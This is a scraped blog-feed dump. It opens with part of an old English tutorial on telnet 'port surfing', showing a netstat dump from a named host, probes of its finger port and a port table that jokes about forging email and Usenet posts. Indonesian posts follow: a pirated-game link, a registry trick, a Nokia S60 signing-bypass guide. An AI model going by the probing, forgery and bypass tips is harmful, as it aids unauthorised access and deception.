*(KSHELL) *(*) LISTEN <br />TCP 0 0 GRANDE.NM.ORG(4174) OSO.NM.ORG(X11) ESTABLISHED <br />TCP 0 0 GRANDE.NM.ORG(4172) OSO.NM.ORG(X11) ESTABLISHED <br />TCP 0 0 GRANDE.NM.ORG(4171) OSO.NM.ORG(X11) ESTABLISHED <br />TCP 0 0 *(FS) *(*) LISTEN <br />UDP 0 0 *(NAMESERVICE) *(*) <br />UDP 0 0 127.0.0.1(NAMESERVICE) *(*) <br />UDP 0 0 GRANDE.NM.OR(NAMESERV) *(*) <br />UDP 0 0 *(TFTP) *(*) <br />UDP 0 0 *(BOOTPS) *(*) <br />UDP 0 0 *(KERBEROS) *(*) <br />UDP 0 0 127.0.0.1(KERBEROS) *(*) <br />UDP 0 0 GRANDE.NM.OR(KERBEROS) *(*) <br />UDP 0 0 *(*) *(*) <br />UDP 0 0 *(SNMP) *(*) <br />UDP 0 0 *(RPC) *(*) <br />UDP 0 0 *(DAYTIME) *(*) <br />UDP 0 0 *(ECHO) *(*) <br />UDP 0 0 *(DISCARD) *(*) <br />UDP 0 0 *(TIME) *(*) <br />UDP 0 0 *(CHARGEN) *(*) <br />UDP 0 0 *(TALK) *(*) <br />UDP 0 0 *(NTALK) *(*) <br />UDP 0 0 *(1023) *(*) <br />UDP 0 0 *(XDMCP) *(*) <br />MultiNet registered RPC programs: <br />Program Version Protocol Port <br />------- ------- -------- ---- <br />PORTMAP 2 TCP 111 <br />PORTMAP 2 UDP 111 <br />MultiNet IP Routing tables: <br />Destination Gateway Flags Refcnt Use Interface MTU <br />---------- ---------- ----- ------ ----- --------- ---- <br />198.59.167.1 LAWRII.NM.ORG Up,Gateway,H 0 2 se0 1500 <br />166.45.0.1 ENSS365.NM.ORG Up,Gateway,H 0 4162 se0 1500 <br />205.138.138.1 ENSS365.NM.ORG Up,Gateway,H 0 71 se0 1500 <br />204.127.160.1 ENSS365.NM.ORG Up,Gateway,H 0 298 se0 1500 <br />127.0.0.1 127.0.0.1 Up,Host 5 1183513 lo0 4136 <br />198.59.167.2 LAWRII.NM.ORG Up,Gateway,H 0 640 se0 1500 <br />192.132.89.2 ENSS365.NM.ORG Up,Gateway,H 0 729 se0 1500 <br />207.77.56.2 ENSS365.NM.ORG Up,Gateway,H 0 5 se0 1500 <br />204.97.213.2 ENSS365.NM.ORG Up,Gateway,H 0 2641 se0 1500 <br />194.90.74.66 ENSS365.NM.ORG Up,Gateway,H 0 1 se0 1500 <br />204.252.102.2 ENSS365.NM.ORG Up,Gateway,H 0 109 se0 1500 <br />205.160.243.2 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500 <br />202.213.4.2 ENSS365.NM.ORG Up,Gateway,H 0 4 se0 1500 <br />202.216.224.66 ENSS365.NM.ORG Up,Gateway,H 0 113 se0 1500 <br />192.132.89.3 ENSS365.NM.ORG Up,Gateway,H 0 1100 se0 1500 <br />198.203.196.67 ENSS365.NM.ORG Up,Gateway,H 0 385 se0 1500 <br />160.205.13.3 ENSS365.NM.ORG Up,Gateway,H 0 78 se0 1500 <br />202.247.107.131 ENSS365.NM.ORG Up,Gateway,H 0 19 se0 1500 <br />198.59.167.4 LAWRII.NM.ORG Up,Gateway,H 0 82 se0 1500 <br />128.148.157.6 ENSS365.NM.ORG Up,Gateway,H 0 198 se0 1500 <br />160.45.10.6 ENSS365.NM.ORG Up,Gateway,H 0 3 se0 1500 <br />128.121.50.7 ENSS365.NM.ORG Up,Gateway,H 0 3052 se0 1500 <br />206.170.113.8 ENSS365.NM.ORG Up,Gateway,H 0 1451 se0 1500 <br />128.148.128.9 ENSS365.NM.ORG Up,Gateway,H 0 1122 se0 1500 <br />203.7.132.9 ENSS365.NM.ORG Up,Gateway,H 0 14 se0 1500 <br />204.216.57.10 ENSS365.NM.ORG Up,Gateway,H 0 180 se0 1500 <br />130.74.1.75 ENSS365.NM.ORG Up,Gateway,H 0 10117 se0 1500 <br />206.68.65.15 ENSS365.NM.ORG Up,Gateway,H 0 249 se0 1500 <br />129.219.13.81 ENSS365.NM.ORG Up,Gateway,H 0 547 se0 1500 <br />204.255.246.18 ENSS365.NM.ORG Up,Gateway,H 0 1125 se0 1500 <br />160.45.24.21 ENSS365.NM.ORG Up,Gateway,H 0 97 se0 1500 <br />206.28.168.21 ENSS365.NM.ORG Up,Gateway,H 0 2093 se0 1500 <br />163.179.3.222 ENSS365.NM.ORG Up,Gateway,H 0 315 se0 1500 <br />198.109.130.33 ENSS365.NM.ORG Up,Gateway,H 0 1825 se0 1500 <br />199.224.108.33 ENSS365.NM.ORG Up,Gateway,H 0 11362 se0 1500 <br />203.7.132.98 ENSS365.NM.ORG Up,Gateway,H 0 73 se0 1500 <br />198.111.253.35 ENSS365.NM.ORG Up,Gateway,H 0 1134 se0 1500 <br />206.149.24.100 ENSS365.NM.ORG Up,Gateway,H 0 3397 se0 1500 <br />165.212.105.106 ENSS365.NM.ORG Up,Gateway,H 0 17 se0 1006 <br />205.238.3.241 ENSS365.NM.ORG Up,Gateway,H 0 69 se0 1500 <br />198.49.44.242 ENSS365.NM.ORG Up,Gateway,H 0 25 se0 1500 <br />194.22.188.242 ENSS365.NM.ORG Up,Gateway,H 0 20 se0 1500 <br />164.64.0 LAWRII.NM.ORG Up,Gateway 1 40377 se0 1500 <br />0.0.0 ENSS365.NM.ORG Up,Gateway 2 4728741 se0 1500 <br />207.66.1 GLORY.NM.ORG Up,Gateway 0 51 se0 1500 <br />205.166.1 GLORY.NM.ORG Up,Gateway 0 1978 se0 1500 <br />204.134.1 LAWRII.NM.ORG Up,Gateway 0 54 se0 1500 <br />204.134.2 GLORY.NM.ORG Up,Gateway 0 138 se0 1500 <br />192.132.2 129.121.248.1 Up,Gateway 0 6345 se0 1500 <br />204.134.67 GLORY.NM.ORG Up,Gateway 0 2022 se0 1500 <br />206.206.67 GLORY.NM.ORG Up,Gateway 0 7778 se0 1500 <br />206.206.68 LAWRII.NM.ORG Up,Gateway 0 3185 se0 1500 <br />207.66.5 GLORY.NM.ORG Up,Gateway 0 626 se0 1500 <br />204.134.69 GLORY.NM.ORG Up,Gateway 0 7990 se0 1500 <br />207.66.6 GLORY.NM.ORG Up,Gateway 0 53 se0 1500 <br />204.134.70 LAWRII.NM.ORG Up,Gateway 0 18011 se0 1500 <br />192.188.135 GLORY.NM.ORG Up,Gateway 0 5 se0 1500 <br />206.206.71 LAWRII.NM.ORG Up,Gateway 0 2 se0 1500 <br />204.134.7 GLORY.NM.ORG Up,Gateway 0 38 se0 1500 <br />199.89.135 GLORY.NM.ORG Up,Gateway 0 99 se0 1500 <br />198.59.136 LAWRII.NM.ORG Up,Gateway 0 1293 se0 1500 <br />204.134.9 GLORY.NM.ORG Up,Gateway 0 21 se0 1500 <br />204.134.73 GLORY.NM.ORG Up,Gateway 0 59794 se0 1500 <br />129.138.0 GLORY.NM.ORG Up,Gateway 0 5262 se0 1500 <br />192.92.10 LAWRII.NM.ORG Up,Gateway 0 163 se0 1500 <br />206.206.75 LAWRII.NM.ORG Up,Gateway 0 604 se0 1500 <br />207.66.13 GLORY.NM.ORG Up,Gateway 0 1184 se0 1500 <br />204.134.77 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500 <br />207.66.14 GLORY.NM.ORG Up,Gateway 0 334 se0 1500 <br />204.134.78 GLORY.NM.ORG Up,Gateway 0 239 se0 1500 <br />204.52.207 GLORY.NM.ORG Up,Gateway 0 293 se0 1500 <br />204.134.79 GLORY.NM.ORG Up,Gateway 0 1294 se0 1500 <br />192.160.144 LAWRII.NM.ORG Up,Gateway 0 117 se0 1500 <br />206.206.80 PENNY.NM.ORG Up,Gateway 0 4663 se0 1500 <br />204.134.80 GLORY.NM.ORG Up,Gateway 0 91 se0 1500 <br />198.99.209 LAWRII.NM.ORG Up,Gateway 0 1136 se0 1500 <br />207.66.17 GLORY.NM.ORG Up,Gateway 0 24173 se0 1500 <br />204.134.82 GLORY.NM.ORG Up,Gateway 0 29766 se0 1500 <br />192.41.211 GLORY.NM.ORG Up,Gateway 0 155 se0 1500 <br />192.189.147 LAWRII.NM.ORG Up,Gateway 0 3133 se0 1500 <br />204.134.84 PENNY.NM.ORG Up,Gateway 0 189 se0 1500 <br />204.134.87 LAWRII.NM.ORG Up,Gateway 0 94 se0 1500 <br />146.88.0 GLORY.NM.ORG Up,Gateway 0 140 se0 1500 <br />192.84.24 GLORY.NM.ORG Up,Gateway 0 3530 se0 1500 <br />204.134.88 LAWRII.NM.ORG Up,Gateway 0 136 se0 1500 <br />198.49.217 GLORY.NM.ORG Up,Gateway 0 303 se0 1500 <br />192.132.89 GLORY.NM.ORG Up,Gateway 0 3513 se0 1500 <br />198.176.219 GLORY.NM.ORG Up,Gateway 0 1278 se0 1500 <br />206.206.92 LAWRII.NM.ORG Up,Gateway 0 1228 se0 1500 <br />192.234.220 129.121.1.91 Up,Gateway 0 2337 se0 1500 <br />204.134.92 LAWRII.NM.ORG Up,Gateway 0 13995 se0 1500 <br />198.59.157 LAWRII.NM.ORG Up,Gateway 0 508 se0 1500 <br />206.206.93 GLORY.NM.ORG Up,Gateway 0 635 se0 1500 <br />204.134.93 GLORY.NM.ORG Up,Gateway 0 907 se0 1500 <br />198.59.158 LAWRII.NM.ORG Up,Gateway 0 14214 se0 1500 <br />198.59.159 LAWRII.NM.ORG Up,Gateway 0 1806 se0 1500 <br />204.134.95 PENNY.NM.ORG Up,Gateway 0 3644 se0 1500 <br />206.206.96 GLORY.NM.ORG Up,Gateway 0 990 se0 1500 <br />206.206.161 LAWRII.NM.ORG Up,Gateway 0 528 se0 1500 <br />198.59.97 PENNY.NM.ORG Up,Gateway 0 55 se0 1500 <br />198.59.161 LAWRII.NM.ORG Up,Gateway 0 497 se0 1500 <br />192.207.226 GLORY.NM.ORG Up,Gateway 0 93217 se0 1500 <br />198.59.99 PENNY.NM.ORG Up,Gateway 0 2 se0 1500 <br />198.59.163 GLORY.NM.ORG Up,Gateway 0 3379 se0 1500 <br />192.133.100 LAWRII.NM.ORG Up,Gateway 0 3649 se0 1500 <br />204.134.100 GLORY.NM.ORG Up,Gateway 0 8 se0 1500 <br />128.165.0 PENNY.NM.ORG Up,Gateway 0 15851 se0 1500 <br />198.59.165 GLORY.NM.ORG Up,Gateway 0 274 se0 1500 <br />206.206.165 LAWRII.NM.ORG Up,Gateway 0 167 se0 1500 <br />206.206.102 GLORY.NM.ORG Up,Gateway 0 5316 se0 1500 <br />160.230.0 LAWRII.NM.ORG Up,Gateway 0 19408 se0 1500 <br />206.206.166 LAWRII.NM.ORG Up,Gateway 0 1756 se0 1500 <br />205.166.231 GLORY.NM.ORG Up,Gateway 0 324 se0 1500 <br />198.59.167 GLORY.NM.ORG Up,Gateway 0 1568 se0 1500 <br />206.206.103 GLORY.NM.ORG Up,Gateway 0 3629 se0 1500 <br />198.59.168 GLORY.NM.ORG Up,Gateway 0 9063 se0 1500 <br />206.206.104 GLORY.NM.ORG Up,Gateway 0 7333 se0 1500 <br />206.206.168 GLORY.NM.ORG Up,Gateway 0 234 se0 1500 <br />204.134.105 LAWRII.NM.ORG Up,Gateway 0 4826 se0 1500 <br />206.206.105 LAWRII.NM.ORG Up,Gateway 0 422 se0 1500 <br />204.134.41 LAWRII.NM.ORG Up,Gateway 0 41782 se0 1500 <br />206.206.169 GLORY.NM.ORG Up,Gateway 0 5101 se0 1500 <br />204.134.42 GLORY.NM.ORG Up,Gateway 0 10761 se0 1500 <br />206.206.170 GLORY.NM.ORG Up,Gateway 0 916 se0 1500 <br />198.49.44 GLORY.NM.ORG Up,Gateway 0 3 se0 1500 <br />198.59.108 GLORY.NM.ORG Up,Gateway 0 2129 se0 1500 <br />204.29.236 GLORY.NM.ORG Up,Gateway 0 125 se0 1500 <br />206.206.172 GLORY.NM.ORG Up,Gateway 0 5839 se0 1500 <br />204.134.108 GLORY.NM.ORG Up,Gateway 0 3216 se0 1500 <br />206.206.173 GLORY.NM.ORG Up,Gateway 0 374 se0 1500 <br />198.175.173 LAWRII.NM.ORG Up,Gateway 0 6227 se0 1500 <br />198.59.110 GLORY.NM.ORG Up,Gateway 0 1797 se0 1500 <br />198.51.238 GLORY.NM.ORG Up,Gateway 0 1356 se0 1500 <br />192.136.110 GLORY.NM.ORG Up,Gateway 0 583 se0 1500 <br />204.134.48 GLORY.NM.ORG Up,Gateway 0 42 se0 1500 <br />198.175.176 LAWRII.NM.ORG Up,Gateway 0 32 se0 1500 <br />206.206.114 LAWRII.NM.ORG Up,Gateway 0 44 se0 1500 <br />206.206.179 LAWRII.NM.ORG Up,Gateway 0 14 se0 1500 <br />198.59.179 PENNY.NM.ORG Up,Gateway 0 222 se0 1500 <br />198.59.115 GLORY.NM.ORG Up,Gateway 1 132886 se0 1500 <br />206.206.181 GLORY.NM.ORG Up,Gateway 0 1354 se0 1500 <br />206.206.182 SIENNA.NM.ORG Up,Gateway 0 16 se0 1500 <br />206.206.118 GLORY.NM.ORG Up,Gateway 0 3423 se0 1500 <br />206.206.119 GLORY.NM.ORG Up,Gateway 0 282 se0 1500 <br />206.206.183 SIENNA.NM.ORG Up,Gateway 0 2473 se0 1500 <br />143.120.0 LAWRII.NM.ORG Up,Gateway 0 123533 se0 1500 <br />206.206.184 GLORY.NM.ORG Up,Gateway 0 1114 se0 1500 <br />205.167.120 GLORY.NM.ORG Up,Gateway 0 4202 se0 1500 <br />206.206.121 GLORY.NM.ORG Up,Gateway 1 71 se0 1500 <br />129.121.0 GRANDE.NM.ORG Up 12 21658599 se0 1500 <br />204.134.122 GLORY.NM.ORG Up,Gateway 0 195 se0 1500 <br />204.134.58 GLORY.NM.ORG Up,Gateway 0 7707 se0 1500 <br />128.123.0 GLORY.NM.ORG Up,Gateway 0 34416 se0 1500 <br />204.134.59 GLORY.NM.ORG Up,Gateway 0 1007 se0 1500 <br />204.134.124 GLORY.NM.ORG Up,Gateway 0 37160 se0 1500 <br />206.206.124 LAWRII.NM.ORG Up,Gateway 0 79 se0 1500 <br />206.206.125 PENNY.NM.ORG Up,Gateway 0 233359 se0 1500 <br />204.134.126 GLORY.NM.ORG Up,Gateway 0 497 se0 1500 <br />206.206.126 LAWRII.NM.ORG Up,Gateway 0 13644 se0 1500 <br />204.69.190 GLORY.NM.ORG Up,Gateway 0 4059 se0 1500 <br />206.206.190 GLORY.NM.ORG Up,Gateway 0 1630 se0 1500 <br />204.134.127 GLORY.NM.ORG Up,Gateway 0 45621 se0 1500 <br />206.206.191 GLORY.NM.ORG Up,Gateway 0 3574 se0 1500 <br />MultiNet IPX Routing tables: <br />Destination Gateway Flags Refcnt Use Interface MTU <br />---------- ---------- ----- ------ ----- --------- ---- <br />MultiNet ARP table: <br />Host Network Address Ethernet Address Arp Flags <br />-------------------------------------------- ---------------- --------- <br />GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 Temporary <br />[UNKNOWN] (IP 129.121.251.1) 00:C0:05:01:2C:D2 Temporary <br />NARANJO.NM.ORG (IP 129.121.1.56) 08:00:87:04:9F:42 Temporary <br />CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 Temporary <br />[UNKNOWN] (IP 129.121.251.5) AA:00:04:00:D2:D0 Temporary <br />LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 Temporary <br />[UNKNOWN] (IP 129.121.1.91) 00:C0:05:01:2C:D2 Temporary <br />BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 Temporary <br />PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 Temporary <br />ARRIBA.NM.ORG (IP 129.121.1.14) 08:00:2B:BC:C1:A7 Temporary <br />AZUL.NM.ORG (IP 129.121.1.51) 08:00:87:00:A1:D3 Temporary <br />ENSS365.NM.ORG (IP 129.121.1.3) 00:00:0C:51:EF:58 Temporary <br />AVATAR.NM.ORG (IP 129.121.254.1) 08:00:5A:1D:52:0D Temporary <br />[UNKNOWN] (IP 129.121.253.2) 08:00:5A:47:4A:1D Temporary <br />[UNKNOWN] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 Temporary <br />CONCHAS.NM.ORG (IP 129.121.1.11) 08:00:5A:47:4A:1D Temporary <br />[UNKNOWN] (IP 129.121.253.10) AA:00:04:00:4B:D0 Temporary <br />MultiNet Network Interface statistics: <br />Name Mtu Network Address Ipkts Ierrs Opkts Oerrs Collis <br />---- --- ------- -------------- ----- ----- ----- ----- ------ <br />se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0 <br />lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0 <br />MultiNet Protocol statistics: <br />65264173 IP packets received <br />22 IP packets smaller than minimum size <br />6928 IP fragments received <br />4 IP fragments timed out <br />34 IP received for unreachable destinations <br />704140 ICMP error packets generated <br />9667 ICMP opcodes out of range <br />4170 Bad ICMP packet checksums <br />734363 ICMP responses <br />734363 ICMP "Echo" packets received <br />734363 ICMP "Echo Reply" packets sent <br />18339 ICMP "Echo Reply" packets received <br />704140 ICMP "Destination Unreachable" packets sent <br />451243 ICMP "Destination Unreachable" packets received <br />1488 ICMP "Source Quench" packets received <br />163911 ICMP "ReDirect" packets received <br />189732 ICMP "Time Exceeded" packets received <br />126966 TCP connections initiated <br />233998 TCP connections established <br />132611 TCP connections accepted <br />67972 TCP connections dropped <br />28182 embryonic TCP connections dropped <br />269399 TCP connections closed <br />10711838 TCP segments timed for RTT <br />10505140 TCP segments updated RTT <br />3927264 TCP delayed ACKs sent <br />666 TCP connections dropped due to retransmit timeouts <br />111040 TCP retransmit timeouts <br />3136 TCP persist timeouts <br />9 TCP persist connection drops <br />16850 TCP keepalive timeouts <br />1195 TCP keepalive probes sent <br />14392 TCP connections dropped due to keepalive timeouts <br />28842663 TCP packets sent <br />12714484 TCP data packets sent <br />1206060086 TCP data bytes sent <br />58321 TCP data packets retransmitted <br />22144036 TCP data bytes retransmitted <br />6802199 TCP ACK-only packets sent <br />1502 TCP window probes sent <br />483 TCP URG-only packets sent <br />8906175 TCP Window-Update-only packets sent <br />359509 TCP control packets sent <br />38675084 TCP packets received <br />28399363 TCP packets received in sequence <br />1929418386 TCP bytes received in sequence <br />25207 TCP packets with checksum errors <br />273374 TCP packets were duplicates <br />230525708 TCP bytes were duplicates <br />3748 TCP packets had some duplicate bytes <br />493214 TCP bytes were partial duplicates <br />2317156 TCP packets were out of order <br />3151204672 TCP bytes were out of order <br />1915 TCP packets had data after window <br />865443 TCP bytes were after window <br />5804 TCP packets for already closed connection <br />941 TCP packets were window probes <br />10847459 TCP packets had ACKs <br />222657 TCP packets had duplicate ACKs <br />1 TCP packet ACKed unsent data <br />1200274739 TCP bytes ACKed <br />141545 TCP packets had window updates <br />13 TCP segments dropped due to PAWS <br />4658158 TCP segments were predicted pure-ACKs <br />24033756 TCP segments were predicted pure-data <br />8087980 TCP PCB cache misses <br />305 Bad UDP header checksums <br />17 Bad UDP data length fields <br />23772272 UDP PCB cache misses <br />MultiNet Buffer Statistics: <br />388 out of 608 buffers in use: <br />30 buffers allocated to Data. <br />10 buffers allocated to Packet Headers. <br />66 buffers allocated to Socket Structures. <br />57 buffers allocated to Protocol Control Blocks. <br />163 buffers allocated to Routing Table Entries. <br />2 buffers allocated to Socket Names and Addresses. <br />48 buffers allocated to Kernel Fork-Processes. <br />2 buffers allocated to Interface Addresses. <br />1 buffer allocated to Multicast Addresses. <br />1 buffer allocated to Timeout Callbacks. <br />6 buffers allocated to Memory Management. <br />2 buffers allocated to Network TTY Control Blocks. <br />11 out of 43 page clusters in use. <br />11 CXBs borrowed from VMS device drivers <br />2 CXBs waiting to return to the VMS device drivers <br />162 Kbytes allocated to MultiNet buffers (44% in use). <br />226 Kbytes of allocated buffer address space (0% of maximum). <br />Connection closed by foreign host. <br /><slug> [68] -> <br />Whoa! What was all that? <br />What we did was telnet to port 15 -- the netstat port-- which on some computers runs a daemon that tells anybody who cares to drop in just about everything about the connection made by all the computers linked to the Internet through this computer. <br />So from this we learned two things: <br />1) Grande.nm.org is a very busy and important computer. <br />2) Even a very busy and important computer can let the random port surfer come and play. <br />So my lady friend wanted to try out another port. I suggested the finger port, number 79. So she gave the command: <br /><slug> [68] ->telnet grande.nm.org 79 <br />Trying 129.121.1.2 ... <br />Connected to grande.nm.org. <br />Escape character is '^]'. <br />finger <br />?Sorry, could not find "FINGER" <br />Connection closed by foreign host. <br /><slug> [69] ->telnet grande.nm.org 79 <br />Trying 129.121.1.2 ... <br />Connected to grande.nm.org. <br />Escape character is '^]'. <br />help <br />?Sorry, could not find "HELP" <br />Connection closed by foreign host. <br /><slug> [69] ->telnet grande.nm.org 79 <br />Trying 129.121.1.2 ... <br />Connected to grande.nm.org. <br />Escape character is '^]'. <br />? <br />?Sorry, could not find "?" <br />Connection closed by foreign host. <br /><slug> [69] ->telnet grande.nm.org 79 <br />Trying 129.121.1.2 ... <br />Connected to grande.nm.org. <br />Escape character is '^]'. <br />man <br />?Sorry, could not find "MAN" <br />Connection closed by foreign host. <br /><slug> [69] -> <br />At first this looks like just a bunch of failed commands. But actually this is pretty fascinating. The reason is that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon. So when she gave the command “finger” and grande.nm.org said ?Sorry, could not find "FINGER,” we knew this port was not following IETF rules. <br />Now on may computers they don’t run the finger daemon at all. This is because finger has so properties that can be used to gain total control of the computer that runs it. <br />But if finger is shut down, and nothing else is running on port 79, we woudl get the answer: <br />telnet: connect: Connection refused. <br />But instead we got connected and grande.nm.org was waiting for a command. <br />Now the normal thing a port surfer does when running an unfmiliar daemon is to coax it into revealing what commands it uses. “Help,” “?” and “man” often work. But it didn’t help us. <br />But even though these commands didn’t help us, they did tell us that the daemon is probably something sensitive. If it were a daemon that was meant for anybody and his brother to use, it would have given us instructions. <br />So what did we do next? We decided to be good Internet citizens and also stay out of jail We decided we’d beter log off. <br />But there was one hack we decided to do first: leave our mark on the shell log file. <br />The shell log file keeps a record of all operating system commands made on a computer. The adminsitrator of an obviously important computer such as grande.nm.org is probably competent enough to scan the records of what commands are given by whom to his computer. Especially on a port important enough to be running a mystery, non-IETF daemon. So everything we types while connected was saved on a log. <br />So my friend giggled with glee and left a few messages on port 79 before logging off. Oh, dear, I do believe she’s hooked on hacking. Hmmm, it could be a good way to meet cute sysadmins... <br />So, port surf’s up! If you want to surf, here’s the basics: <br />1) Get logged on to a shell account. That’s an account with your ISP that lets you give Unix commands. Or -- run Linux or some other kind of Unix on your PC and hook up to the Internet. <br />2) Give the command “telnet <hostname> <pot number>“ where <hostname> is the internet address of the computer you wnat to visit and <port number> is whatever looks phun to you. <br />3) If you get the response “connected to <hostname>,” then surf’s up! <br />Following are some of my favorite ports. It is legal and harmless to pay them visits so long as you don’t figure out how to gain superuser status while playing with them. However, please note that if you do too much port surfing from your shell account, your sysadmin may notice this in his or her shell log file. If he or she is prejudiced against hacking , you may get kicked off your ISP. So you may want to explain in advance that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix. Yeh, that sounds good... <br />Port number Service Why it’s phun! <br />7 echo Whatever you type in, the host repeats back to you, used for ping <br />9 discard Dev/null -- how fast can you figure out this one? <br />11 systat Lots of info on users <br />13 daytime Time and date at computer’s location <br />15 netstat Tremendous info on networks but rarely used any more <br />19 chargen Pours out a stream of ASCII characters. Use ^C to stop. <br />21 ftp Transfers files <br />22 ssh secure shell login -- encrypted tunnel <br />23 telnet Where you log in if you don’t use ssh:) <br />25 smpt Forge email from Bill.Gates@Microsoft.org. <br />37 time Time <br />39 rlp Resource location <br />43 whois Info on hosts and networks <br />53 domain Nameserver <br />70 gopher Out-of-date info hunter <br />79 finger Lots of info on users <br />80 http Web server <br />110 pop Incoming email <br />119 nntp Usenet news groups -- forge posts, cancels <br />443 shttp Another web server <br />512 biff Mail notification <br />513 rlogin Remote login <br />who Remote who and uptime <br />514 shell Remote command, no password used! <br />syslog Remote system logging -- how we bust hackers <br />520 route Routing information protocol <br />************************** <br />Propeller head tip: Note that in most cases an Internet host will use these port number assignments for these services. More than one service may also be assigned simultaneously to the same port. This numbering system is voluntarily offered by the Internet Engineering Task Force (IETF). That means that an Internet host may use other ports for these services. Expect the unexpected! <br />If you have a copy of Linux, you can get the list of all the IETF assignments of port numbers in the file /etc/services. <br />******************************** <br />salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-49995992955392570802011-10-06T11:38:00.001-07:002011-10-06T11:38:47.790-07:00Buat kawan-kawan blogger yang masih bingung mau nyari tempat download game yang 100% Full Version and Gratis ( Pastinya ;D ). Saya mau bagi-bagi link tempat download game Full Version yang 100% Gratis...
Ini dia Linknya :
<a href="http://www.mediafire.com/?sharekey=ffa962b03f06ebdd7069484bded33bcd54946d876c3b5458#">
Link Gratis</a>
Semoga game yang kawan-kawan cari ada disana semua... Kalo gag ada tinggal komen aja di postingan ini, terus kasih tau saya game yang pengen kawan-kawan cari. Nanti akan saya ber linknya...salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-719777152217690712011-10-06T11:33:00.000-07:002011-10-06T11:33:49.444-07:00menyembunyikan drive pada windows explorerMohon maaf sebelumnya, karena setelah hampir selama 2 bulan lebih saya tidak pernah melakukan posting di BLOG ini. Dan selama itu, saya sedang sibuk dengan tugas di sekolah.
Jadi sekali lagi saya memohon MAAF sebesar-besarnya. Pada postingan kali ini saya akan memberikan tips tentang Bagaimana Caranya Menyembunyikan Drive Pada Windows Explorer di Windows 7.
Berikut triknya :
1. Pertama-tama buka Windows Explorer
2. Cek drive yang akan Anda sembunyikan di Windows Explorer
3. Klik Start Menu, ketik "regedit" (tanpa tanda petik) pada Search Box lalu tekan ENTER
4. Klik HKEY_CURRENT_USER -> Software -> Microsoft -> Windows -> CurrentVersion -> Policies -> Explorer. Klik kanan pada panel sebelah kanan, pilih New -> DWORD (32-bit) Value
5. Beri nama NoDrives
6. Value yang diberikan adalah 32-bit sehingga untuk menyembunyikan drive A value data decimal yang diberikan adalah 1 atau hexadecimal 1. Sebagai contoh lainnya untuk drive E, Value data pada decimal adalah 16 atau hexadecimal 10.
7. Hasilnya dapat Anda lihat pada Windows Explorer, dengan melakukan Log Off terlebih dahulu.
Untuk menampilkan kembali drive yang terhidden tersebut Anda dapat meremove key NoDrives tersebut pada REGEDIT
Semoga Artikel saya kali ini bermanfaat salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-87358788224041246872011-09-23T06:55:00.001-07:002011-09-23T06:55:12.366-07:00s60v9.2 3rd hack..........Bosen jika mengistal selalu aja bilang sertifikat kadaluarsa anda harus memundurkan tanggal hape atau aplikasi unsigned yang ga bisa di instal, mau bebas mengistal apapun tapi resiko tanggung sendiri lho.. Asal anda percaya aplikasi tersebut terpecaya dapat diinstal tanpa mikirin aplikasi signed atau ga.. Ada caranya seperti berikut,tujuanya ngehack hape,agar bisa mengistal perangkat lunak apapun. ini udah di coba di hape s60v3 nokia 6120classic punyaku,
Caranya.
1.download aplikasi buat ngehack hape 3rd dibawah
2.ekstak kedalam kartu memory misal pada folder other
3.instal xplore v1.30
4.instal hellocarbide.sisx ke dalam kartu memory telepon
5.jalankan xplore tapi jika keluar jangan ditutup keluar dengan meminimalkan menggunakan tombol menu
6.buka hellocarbide tekan pilihan pilih menu1 maka akan muncul konfirmasi tekan"ya" agar dapat mengakses penuh hape
7.tekan dan tahan menu lalu pilih xplore
8.salin CProfeDriver_SISX.Idd dan installserver.exe dari arsip yang telah di exstrak tadi ke folder C:\sys\bin
9.menuju folder c:\resource lalu buat folder yg benama swicerstore lalu klik dan buat lagi di dalamnya folder dat sehingga menjadi C:\resource\swicerstore\dat
10. Lalu menuju ke arsip ekstrak lalu copy 00000001 lalu ke C:\resource\swicerstore\dat lalu paste disitu lalu buat atribut folder swicerstore,dat,00000001 menjadi read-only.
11.buat folder gensign pada folder E:\ lalu salin gensign.cer dan gensign.key ke folder E:\gensign
12.restart hape
13.instal capsoff.sisx dan capson.sisx dari arsip exstrak
14.restart hape lagi
15.anda dapat mengakses penuh hape dengan menekan app capsoff dan dapat mengakses folder private dari hape anda,lalu app capson untuk menutup private.
Nah sekarang hape anda udah di hack anda dapat mengistal aplikasi unsigned atau certifikat kadaluasa
Peringatan penting
Jangan salah instal software,karena Segala resiko tangung sendiri
Sebagai saran Installlah perangkat lunak yang dipercaya
salazarneohttp://www.blogger.com/profile/04983200061646218931noreply@blogger.com0tag:blogger.com,1999:blog-6131119357393476294.post-54178985689226324982011-07-16T11:08:00.000-07:002011-07-16T11:14:30.560-07:00UT DOWNLOAD VIRUS SHORTCUT REMOVER<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyrqhgjRvVoyfnIFtfYEWomiTal3srmGE0Rc_yzPXe1JMz3GSz9WSGJ68-GKr0RSKZoSdGg-DZJHmzTrflAwJBS8pksPXWAkGC-fkEIwPBcToVtImsVbpxuylGnB7uYt0SIhRFKZXmZHM/s1600/shortcutremover.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 300px; height: 181px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyrqhgjRvVoyfnIFtfYEWomiTal3srmGE0Rc_yzPXe1JMz3GSz9WSGJ68-GKr0RSKZoSdGg-DZJHmzTrflAwJBS8pksPXWAkGC-fkEIwPBcToVtImsVbpxuylGnB7uYt0SIhRFKZXmZHM/s320/shortcutremover.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5630015209374324882" 